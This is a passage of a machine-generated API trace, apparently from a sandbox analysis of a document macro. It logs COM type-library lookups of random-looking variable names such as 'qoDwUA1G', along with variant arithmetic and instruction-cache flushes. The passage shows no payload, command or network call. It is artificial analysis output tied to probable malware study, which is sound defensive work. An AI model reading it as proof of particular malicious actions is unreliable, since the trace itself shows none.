IUnknown:Release (This=0xaf0b528) returned 0x3 [0068.579] IUnknown:AddRef (This=0xaf0b6e0) returned 0x4 [0068.579] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146438 | out: ppvObject=0x146438*=0x0) returned 0x80004002 [0068.579] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x146430 | out: ppvObject=0x146430*=0x0) returned 0x80004002 [0068.579] IUnknown:Release (This=0xaf0b6e0) returned 0x3 [0068.579] free (_Block=0x0) [0068.579] free (_Block=0x0) [0068.579] free (_Block=0x0) [0068.579] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.579] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.579] GetCurrentProcess () returned 0xffffffffffffffff [0068.579] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0068.579] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.579] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.579] GetCurrentProcess () returned 0xffffffffffffffff [0068.579] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0068.579] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.579] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.579] GetCurrentProcess () returned 0xffffffffffffffff [0068.579] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0068.579] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.579] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.579] GetCurrentProcess () returned 0xffffffffffffffff [0068.579] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0068.579] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.579] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.580] GetCurrentProcess () returned 0xffffffffffffffff [0068.580] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0068.580] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.580] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.580] GetCurrentProcess () returned 0xffffffffffffffff [0068.580] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0068.580] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6238, dwSize=0x8) returned 1 [0068.581] GetCurrentProcess () returned 0xffffffffffffffff [0068.581] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb62f8, dwSize=0x8) returned 1 [0068.581] GetCurrentProcess () returned 0xffffffffffffffff [0068.581] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb68b8, dwSize=0x8) returned 1 [0068.581] GetCurrentProcess () returned 0xffffffffffffffff [0068.581] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6978, dwSize=0x8) returned 1 [0068.581] GetCurrentProcess () returned 0xffffffffffffffff [0068.581] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6a38, dwSize=0x8) returned 1 [0068.581] GetCurrentProcess () returned 0xffffffffffffffff [0068.581] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb6de0, dwSize=0x8) returned 1 [0068.581] free (_Block=0x0) [0068.581] free (_Block=0x0) [0068.581] free (_Block=0x0) [0068.586] VarCmp (pvarLeft=0xaf00060, pvarRight=0xaf00048, lcid=0x0, dwFlags=0x30001) returned 0x1 [0068.763] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaf00018, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.766] sqrt (_X=0x3) returned 0x41c0000000000000 [0068.766] VarDiv (in: pvarLeft=0xaefffd0, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.766] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0068.766] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0068.769] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeffcf8, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarCmp (pvarLeft=0xaeffcc8, pvarRight=0xaeffcb0, lcid=0x0, dwFlags=0x30001) returned 0x1 [0068.769] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeffc98, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] sqrt (_X=0x3) returned 0x41a0000000000000 [0068.769] VarDiv (in: pvarLeft=0xaeffc68, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0068.769] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0068.769] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeffbf0, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarCmp (pvarLeft=0xaeffbc0, pvarRight=0xaeffba8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0068.769] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeffb90, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] sqrt (_X=0x3) returned 0x41b0000000000000 [0068.769] VarDiv (in: pvarLeft=0xaeffb60, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarDiv (in: pvarLeft=0xaf00030, pvarRight=0xaefffb8, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0068.769] RtlUnwindEx (TargetFrame=0x1467c0, TargetIp=0x7fee3890791, ExceptionRecord=0x0, ReturnValue=0x1468d0, ContextRecord=0x146230, HistoryTable=0x0) [0068.769] VarMul (in: pvarLeft=0xaf00000, pvarRight=0xaeffae8, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaeffab8, pvarRight=0xaf00000, pvarResult=0xaf00030 | out: pvarResult=0xaf00030) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaf00030, pvarRight=0xaeffaa0, pvarResult=0xaefffa0 | out: pvarResult=0xaefffa0) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaefffa0, pvarRight=0xaefffb8, pvarResult=0xaefff70 | out: pvarResult=0xaefff70) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaefff70, pvarRight=0xaeffa88, pvarResult=0xaefff10 | out: pvarResult=0xaefff10) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaefff10, pvarRight=0xaefff88, pvarResult=0xaeffee0 | out: pvarResult=0xaeffee0) returned 0x0 [0068.769] VarAdd (in: pvarLeft=0xaeffee0, pvarRight=0xaeffa70, pvarResult=0xaeffe98 | out: pvarResult=0xaeffe98) returned 0x0 [0068.770] VarAdd (in: pvarLeft=0xaeffe98, pvarRight=0xaeffa58, pvarResult=0xaeffe80 | out: pvarResult=0xaeffe80) returned 0x0 [0068.770] VarAdd (in: pvarLeft=0xaeffe80, pvarRight=0xaeffa40, pvarResult=0xaeffe68 | out: pvarResult=0xaeffe68) returned 0x0 [0068.770] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646fd70 [0068.770] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4aa0000 [0068.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qoDwUA1G") returned 9 [0068.771] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qoDwUA1G", lHashVal=0x1088c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qoDwUA1G") returned 9 [0068.771] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qoDwUA1G", lHashVal=0x1088c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qoDwUA1G") returned 9 [0068.771] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qoDwUA1G", lHashVal=0x1088c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.771] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qoDwUA1G") returned 0x1088c1 [0068.771] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qoDwUA1G" | out: _Dst="qoDwUA1G") returned 0x0 [0068.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qoDwUA1G") returned 9 [0068.771] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.771] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qoDwUA1G", lHashVal=0x1088c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.771] IUnknown:Release (This=0x665ba50) returned 0xb [0068.771] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.772] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qoDwUA1G", lHashVal=0x1088c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.772] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.772] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.772] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qoDwUA1G", lHashVal=0x1088c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.772] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.772] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.772] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qoDwUA1G", lHashVal=0x1088c1, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.772] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60a82, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qoDwUA1G") returned 9 [0068.772] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qoDwUA1G", lHashVal=0x1088c1, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.772] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.772] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a60a82 | out: _Dst=0x67c2d40) returned 0x0 [0068.772] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qoDwUA1G") returned 0x10604a [0068.772] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qoDwUA1G" | out: _Dst="_B_var_qoDwUA1G") returned 0x0 [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qoDwUA1G") returned 16 [0068.772] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.772] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qoDwUA1G", lHashVal=0x10604a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.772] IUnknown:Release (This=0x665ba50) returned 0xb [0068.772] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.772] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qoDwUA1G", lHashVal=0x10604a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.772] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.772] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.772] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qoDwUA1G", lHashVal=0x10604a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.772] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.772] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.772] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qoDwUA1G", lHashVal=0x10604a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.772] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.772] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.772] IUnknown:Release (This=0x665ba50) returned 0xb [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc235a, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_qoDwUA1G") returned 16 [0068.772] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qoDwUA1G", lHashVal=0x10604a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x55007700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x55007700000000, pDummy=0x0) returned 0x0 [0068.772] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a60a82 | out: _Dst=0x144ec0) returned 0x0 [0068.772] realloc (_Block=0x0, _Size=0x200) returned 0x251d1b0 [0068.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sGUQAo") returned 7 [0068.772] ITypeComp:RemoteBind (in: This=0x665ba60, szName="sGUQAo", lHashVal=0x102142, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sGUQAo") returned 7 [0068.773] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="sGUQAo", lHashVal=0x102142, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sGUQAo") returned 7 [0068.773] ITypeComp:RemoteBind (in: This=0x665bd30, szName="sGUQAo", lHashVal=0x102142, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="sGUQAo") returned 0x102142 [0068.773] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="sGUQAo" | out: _Dst="sGUQAo") returned 0x0 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="sGUQAo") returned 7 [0068.773] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.773] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="sGUQAo", lHashVal=0x102142, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.773] IUnknown:Release (This=0x665ba50) returned 0xb [0068.773] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.773] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="sGUQAo", lHashVal=0x102142, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.773] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.773] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.773] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="sGUQAo", lHashVal=0x102142, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.773] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.773] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.773] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="sGUQAo", lHashVal=0x102142, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.773] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60aae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="sGUQAo") returned 7 [0068.773] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="sGUQAo", lHashVal=0x102142, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.773] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.773] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a60aae | out: _Dst=0x67c2d40) returned 0x0 [0068.773] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_sGUQAo") returned 0x109beb [0068.773] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_sGUQAo" | out: _Dst="_B_var_sGUQAo") returned 0x0 [0068.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_sGUQAo") returned 14 [0068.773] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.773] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_sGUQAo", lHashVal=0x109beb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.773] IUnknown:Release (This=0x665ba50) returned 0xb [0068.773] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.773] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_sGUQAo", lHashVal=0x109beb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.773] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.773] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.774] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_sGUQAo", lHashVal=0x109beb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.774] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.774] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.774] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_sGUQAo", lHashVal=0x109beb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.774] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.774] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.774] IUnknown:Release (This=0x665ba50) returned 0xb [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc238a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_sGUQAo") returned 14 [0068.774] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_sGUQAo", lHashVal=0x109beb, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x73005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0068.774] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a60aae | out: _Dst=0x144ec0) returned 0x0 [0068.774] realloc (_Block=0x0, _Size=0xc0) returned 0x251d3c0 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wZA_UQGo") returned 9 [0068.774] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wZA_UQGo", lHashVal=0x1067de, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wZA_UQGo") returned 9 [0068.774] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wZA_UQGo", lHashVal=0x1067de, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wZA_UQGo") returned 9 [0068.774] ITypeComp:RemoteBind (in: This=0x665bd30, szName="wZA_UQGo", lHashVal=0x1067de, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.774] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="wZA_UQGo") returned 0x1067de [0068.774] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="wZA_UQGo" | out: _Dst="wZA_UQGo") returned 0x0 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="wZA_UQGo") returned 9 [0068.774] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.774] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="wZA_UQGo", lHashVal=0x1067de, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.774] IUnknown:Release (This=0x665ba50) returned 0xb [0068.774] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.774] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="wZA_UQGo", lHashVal=0x1067de, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.774] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.774] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.774] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="wZA_UQGo", lHashVal=0x1067de, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.774] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.774] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.774] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="wZA_UQGo", lHashVal=0x1067de, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.774] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a60afe, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wZA_UQGo") returned 9 [0068.774] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="wZA_UQGo", lHashVal=0x1067de, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, 